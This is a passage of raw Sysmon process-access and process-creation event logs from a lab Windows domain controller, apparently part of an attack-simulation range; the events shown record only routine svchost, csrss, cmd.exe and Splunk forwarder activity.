13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4329-6000-DB00-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4329-6000-DA00-000000009A01}30524372C:\Windows\system32\cmd.exe{08A6967A-4329-6000-DB00-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.150{08A6967A-4329-6000-DB00-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{08A6967A-4329-6000-DA00-000000009A01}3052C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000004030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4329-6000-DA00-000000009A01}3052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4329-6000-DA00-000000009A01}3052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4329-6000-DA00-000000009A01}3052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.144{08A6967A-4329-6000-DA00-000000009A01}3052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.112{08A6967A-4328-6000-D900-000000009A01}20324928C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-432A-6000-E500-000000009A01}5076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.380{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\